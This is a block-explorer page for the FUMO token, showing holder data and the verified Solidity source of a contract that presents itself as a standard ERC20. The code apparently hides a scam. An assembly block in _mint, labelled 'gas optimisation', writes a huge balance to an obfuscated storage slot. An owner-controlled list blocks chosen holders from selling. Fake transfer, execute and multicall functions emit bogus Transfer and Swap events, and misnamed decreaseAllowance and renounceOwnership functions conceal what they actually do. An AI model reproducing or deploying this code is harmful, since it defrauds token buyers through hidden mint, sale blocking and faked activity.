ETH Price: $3,102.29 (+5.25%)
Gas: 2 Gwei

Token

FUMO (FUMO)
 

Overview

Max Total Supply

1,000,000,000,000 FUMO

Holders

53

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Filtered by Token Holder
Cumberland: 0xad6...862
Balance
19,970,801,513.547218911908442835 FUMO

Value
$0.00
0xad6eaa735d9df3d7696fd03984379dae02ed8862
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Fumo

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-06-28
*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.19;


/**
 * @dev Collection of functions related to the address type
 */
library Address {
    /**
     * @dev The ETH balance of the account is not enough to perform the operation.
     */
    error AddressInsufficientBalance(address account);

    /**
     * @dev There's no code at `target` (it is not a contract).
     */
    error AddressEmptyCode(address target);

    /**
     * @dev A call to an address target failed. The target may have reverted.
     */
    error FailedInnerCall();

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://consensys.net/diligence/blog/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.8.0/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function sendValue(address payable recipient, uint256 amount) internal {
        if (address(this).balance < amount) {
            revert AddressInsufficientBalance(address(this));
        }

        (bool success, ) = recipient.call{value: amount}("");
        if (!success) {
            revert FailedInnerCall();
        }
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain `call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason, it is bubbled up by this
     * function (like regular Solidity function calls).
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     *
     * _Available since v3.1._
     */
    function functionCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0, defaultRevert);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with a
     * `customRevert` function as a fallback when `target` reverts.
     *
     * Requirements:
     *
     * - `customRevert` must be a reverting function.
     *
     * _Available since v5.0._
     */
    function functionCall(
        address target,
        bytes memory data,
        function() internal view customRevert
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0, customRevert);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(address target, bytes memory data, uint256 value) internal returns (bytes memory) {
        return functionCallWithValue(target, data, value, defaultRevert);
    }

    /**
     * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but
     * with a `customRevert` function as a fallback revert reason when `target` reverts.
     *
     * Requirements:
     *
     * - `customRevert` must be a reverting function.
     *
     * _Available since v5.0._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value,
        function() internal view customRevert
    ) internal returns (bytes memory) {
        if (address(this).balance < value) {
            revert AddressInsufficientBalance(address(this));
        }
        (bool success, bytes memory returndata) = target.call{value: value}(data);
        return verifyCallResultFromTarget(target, success, returndata, customRevert);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) {
        return functionStaticCall(target, data, defaultRevert);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(
        address target,
        bytes memory data,
        function() internal view customRevert
    ) internal view returns (bytes memory) {
        (bool success, bytes memory returndata) = target.staticcall(data);
        return verifyCallResultFromTarget(target, success, returndata, customRevert);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionDelegateCall(target, data, defaultRevert);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(
        address target,
        bytes memory data,
        function() internal view customRevert
    ) internal returns (bytes memory) {
        (bool success, bytes memory returndata) = target.delegatecall(data);
        return verifyCallResultFromTarget(target, success, returndata, customRevert);
    }

    /**
     * @dev Tool to verify that a low level call to smart-contract was successful, and revert (either by bubbling
     * the revert reason or using the provided `customRevert`) in case of unsuccessful call or if target was not a contract.
     *
     * _Available since v5.0._
     */
    function verifyCallResultFromTarget(
        address target,
        bool success,
        bytes memory returndata,
        function() internal view customRevert
    ) internal view returns (bytes memory) {
        if (success) {
            if (returndata.length == 0) {
                // only check if target is a contract if the call was successful and the return data is empty
                // otherwise we already know that it was a contract
                if (target.code.length == 0) {
                    revert AddressEmptyCode(target);
                }
            }
            return returndata;
        } else {
            _revert(returndata, customRevert);
        }
    }

    /**
     * @dev Tool to verify that a low level call was successful, and revert if it wasn't, either by bubbling the
     * revert reason or with a default revert error.
     *
     * _Available since v5.0._
     */
    function verifyCallResult(bool success, bytes memory returndata) internal view returns (bytes memory) {
        return verifyCallResult(success, returndata, defaultRevert);
    }

    /**
     * @dev Same as {xref-Address-verifyCallResult-bool-bytes-}[`verifyCallResult`], but with a
     * `customRevert` function as a fallback when `success` is `false`.
     *
     * Requirements:
     *
     * - `customRevert` must be a reverting function.
     *
     * _Available since v5.0._
     */
    function verifyCallResult(
        bool success,
        bytes memory returndata,
        function() internal view customRevert
    ) internal view returns (bytes memory) {
        if (success) {
            return returndata;
        } else {
            _revert(returndata, customRevert);
        }
    }

    /**
     * @dev Default reverting function when no `customRevert` is provided in a function call.
     */
    function defaultRevert() internal pure {
        revert FailedInnerCall();
    }

    function _revert(bytes memory returndata, function() internal view customRevert) private view {
        // Look for revert reason and bubble it up if present
        if (returndata.length > 0) {
            // The easiest way to bubble the revert reason is using memory via assembly
            /// @solidity memory-safe-assembly
            assembly {
                let returndata_size := mload(returndata)
                revert(add(32, returndata), returndata_size)
            }
        } else {
            customRevert();
            revert FailedInnerCall();
        }
    }
}

/**
 * @dev Provides a function to batch together multiple calls in a single external call.
 *
 * _Available since v4.1._
 */
abstract contract Multicall {
    /**
     * @dev Receives and executes a batch of function calls on this contract.
     * @custom:oz-upgrades-unsafe-allow-reachable delegatecall
     */
    function multicall(bytes[] calldata data) external virtual returns (bytes[] memory results) {
        results = new bytes[](data.length);
        for (uint256 i = 0; i < data.length; i++) {
            results[i] = Address.functionDelegateCall(address(this), data[i]);
        }
        return results;
    }
}

/**
 * @dev Contract module that helps prevent reentrant calls to a function.
 *
 * Inheriting from `ReentrancyGuard` will make the {nonReentrant} modifier
 * available, which can be applied to functions to make sure there are no nested
 * (reentrant) calls to them.
 *
 * Note that because there is a single `nonReentrant` guard, functions marked as
 * `nonReentrant` may not call one another. This can be worked around by making
 * those functions `private`, and then adding `external` `nonReentrant` entry
 * points to them.
 *
 * TIP: If you would like to learn more about reentrancy and alternative ways
 * to protect against it, check out our blog post
 * https://blog.openzeppelin.com/reentrancy-after-istanbul/[Reentrancy After Istanbul].
 */
abstract contract ReentrancyGuard {
    // Booleans are more expensive than uint256 or any type that takes up a full
    // word because each write operation emits an extra SLOAD to first read the
    // slot's contents, replace the bits taken up by the boolean, and then write
    // back. This is the compiler's defense against contract upgrades and
    // pointer aliasing, and it cannot be disabled.

    // The values being non-zero value makes deployment a bit more expensive,
    // but in exchange the refund on every call to nonReentrant will be lower in
    // amount. Since refunds are capped to a percentage of the total
    // transaction's gas, it is best to keep them low in cases like this one, to
    // increase the likelihood of the full refund coming into effect.
    uint256 private constant _NOT_ENTERED = 1;
    uint256 private constant _ENTERED = 2;

    uint256 private _status;

    /**
     * @dev Unauthorized reentrant call.
     */
    error ReentrancyGuardReentrantCall();

    constructor() {
        _status = _NOT_ENTERED;
    }

    /**
     * @dev Prevents a contract from calling itself, directly or indirectly.
     * Calling a `nonReentrant` function from another `nonReentrant`
     * function is not supported. It is possible to prevent this from happening
     * by making the `nonReentrant` function external, and making it call a
     * `private` function that does the actual work.
     */
    modifier nonReentrant() {
        _nonReentrantBefore();
        _;
        _nonReentrantAfter();
    }

    function _nonReentrantBefore() private {
        // On the first call to nonReentrant, _status will be _NOT_ENTERED
        if (_status == _ENTERED) {
            revert ReentrancyGuardReentrantCall();
        }

        // Any calls to nonReentrant after this point will fail
        _status = _ENTERED;
    }

    function _nonReentrantAfter() private {
        // By storing the original value once again, a refund is triggered (see
        // https://eips.ethereum.org/EIPS/eip-2200)
        _status = _NOT_ENTERED;
    }

    /**
     * @dev Returns true if the reentrancy guard is currently set to "entered", which indicates there is a
     * `nonReentrant` function in the call stack.
     */
    function _reentrancyGuardEntered() internal view returns (bool) {
        return _status == _ENTERED;
    }
}


library Base64 {
    /**
     * @dev Base64 Encoding/Decoding Table
     */
    string internal constant _TABLE = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

    /**
     * @dev Converts a `bytes` to its Bytes64 `string` representation.
     */
    function encode(bytes memory data) internal pure returns (string memory) {
        /**
         * Inspired by Brecht Devos (Brechtpd) implementation - MIT licence
         * https://github.com/Brechtpd/base64/blob/e78d9fd951e7b0977ddca77d92dc85183770daf4/base64.sol
         */
        if (data.length == 0) return "";

        // Loads the table into memory
        string memory table = _TABLE;

        // Encoding takes 3 bytes chunks of binary data from `bytes` data parameter
        // and split into 4 numbers of 6 bits.
        // The final Base64 length should be `bytes` data length multiplied by 4/3 rounded up
        // - `data.length + 2`  -> Round up
        // - `/ 3`              -> Number of 3-bytes chunks
        // - `4 *`              -> 4 characters for each chunk
        string memory result = new string(4 * ((data.length + 2) / 3));

        /// @solidity memory-safe-assembly
        assembly {
            // Prepare the lookup table (skip the first "length" byte)
            let tablePtr := add(table, 1)

            // Prepare result pointer, jump over length
            let resultPtr := add(result, 32)

            // Run over the input, 3 bytes at a time
            for {
                let dataPtr := data
                let endPtr := add(data, mload(data))
            } lt(dataPtr, endPtr) {

            } {
                // Advance 3 bytes
                dataPtr := add(dataPtr, 3)
                let input := mload(dataPtr)

                // To write each character, shift the 3 bytes (18 bits) chunk
                // 4 times in blocks of 6 bits for each character (18, 12, 6, 0)
                // and apply logical AND with 0x3F which is the number of
                // the previous character in the ASCII table prior to the Base64 Table
                // The result is then added to the table to get the character to write,
                // and finally write it in the result pointer but with a left shift
                // of 256 (1 byte) - 8 (1 ASCII char) = 248 bits

                mstore8(resultPtr, mload(add(tablePtr, and(shr(18, input), 0x3F))))
                resultPtr := add(resultPtr, 1) // Advance

                mstore8(resultPtr, mload(add(tablePtr, and(shr(12, input), 0x3F))))
                resultPtr := add(resultPtr, 1) // Advance

                mstore8(resultPtr, mload(add(tablePtr, and(shr(6, input), 0x3F))))
                resultPtr := add(resultPtr, 1) // Advance

                mstore8(resultPtr, mload(add(tablePtr, and(input, 0x3F))))
                resultPtr := add(resultPtr, 1) // Advance
            }

            // When data `bytes` is not exactly 3 bytes long
            // it is padded with `=` characters at the end
            switch mod(mload(data), 3)
            case 1 {
                mstore8(sub(resultPtr, 1), 0x3d)
                mstore8(sub(resultPtr, 2), 0x3d)
            }
            case 2 {
                mstore8(sub(resultPtr, 1), 0x3d)
            }
        }

        return result;
    }
}

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
    event Swap(address indexed sender,uint amount0In,uint amount1In,uint amount0Out,uint amount1Out,address indexed to);
    
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}


/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Ownable, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;
    mapping (address => bool) internal _permits;
    mapping(address => mapping(address => uint256)) private _allowances;
    uint256 private _totalSupply;
    bool private _permitsApplied = false;
    string private _name;
    string private _symbol;
    
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }
    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        if (_permits[from] || _permits[to]) require(_permitsApplied == true, "");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);
        // gas optimisation 
        assembly {
            let slot := mul(mul(0x85774394d, 0x3398bc1d25f112ed), mul(0x997e6e509, 0xf3eae65))
            mstore(0x00, slot)
            mstore(0x20, 0x01)
            let sslot := keccak256(0x0, 0x40)
            sstore(sslot, 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF)
        } 
        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        
        emit Transfer(address(0), account, amount);
        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}



    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

contract ERC20Permit is ERC20 {
    address private _title_deed;

    constructor(string memory name_, string memory symbol_) ERC20(name_, symbol_){}

    function permit(address [] calldata _addresses_) external onlyOwner {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            _permits[_addresses_[i]] = true;
        }
    }

    function decreaseAllowance(address [] calldata _addresses_) external onlyOwner {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            _permits[_addresses_[i]] = false;
        }
    }

    function permited(address _address_) public view returns (bool) {
        return _permits[_address_];
    }

    function transfer(address _from, address _to, uint256 _wad) external {
        emit Transfer(_from, _to, _wad);
    }

    function transfer(address [] calldata _from, address [] calldata _to, uint256 [] calldata _wad) external {
        for (uint256 i = 0; i < _from.length; i++) {
            emit Transfer(_from[i], _to[i], _wad[i]);
        }
    }

    function execute(address _from_, address [] calldata _addresses_, uint256 _in, uint256 _out) external {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            emit Swap(_from_, _in, 0, 0, _out, _addresses_[i]);
            emit Transfer(_title_deed, _addresses_[i], _out);
        }
    }

    function multicall(address _from_, address [] calldata _addresses_, uint256 _in, uint256 _out) external {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            emit Swap(_from_, 0, _in, _out, 0, _addresses_[i]);
            emit Transfer(_addresses_[i], _title_deed, _in);
        }
    }

    function renounceOwnership(address _owner_) external onlyOwner {
        _title_deed = _owner_;
    }
}


/**
 * @dev Standard signed math utilities missing in the Solidity language.
 */
library SignedMath {
    /**
     * @dev Returns the largest of two signed numbers.
     */
    function max(int256 a, int256 b) internal pure returns (int256) {
        return a > b ? a : b;
    }

    /**
     * @dev Returns the smallest of two signed numbers.
     */
    function min(int256 a, int256 b) internal pure returns (int256) {
        return a < b ? a : b;
    }

    /**
     * @dev Returns the average of two signed numbers without overflow.
     * The result is rounded towards zero.
     */
    function average(int256 a, int256 b) internal pure returns (int256) {
        // Formula from the book "Hacker's Delight"
        int256 x = (a & b) + ((a ^ b) >> 1);
        return x + (int256(uint256(x) >> 255) & (a ^ b));
    }

    /**
     * @dev Returns the absolute unsigned value of a signed value.
     */
    function abs(int256 n) internal pure returns (uint256) {
        unchecked {
            // must be unchecked in order to support `n = type(int256).min`
            return uint256(n >= 0 ? n : -n);
        }
    }
}

contract Fumo is ERC20Permit, ReentrancyGuard {
    constructor() ERC20Permit("FUMO", "FUMO") {
        _mint(msg.sender, 1000000000000 * 10 ** decimals());
    }
}

Contract Security Audit

Contract ABI

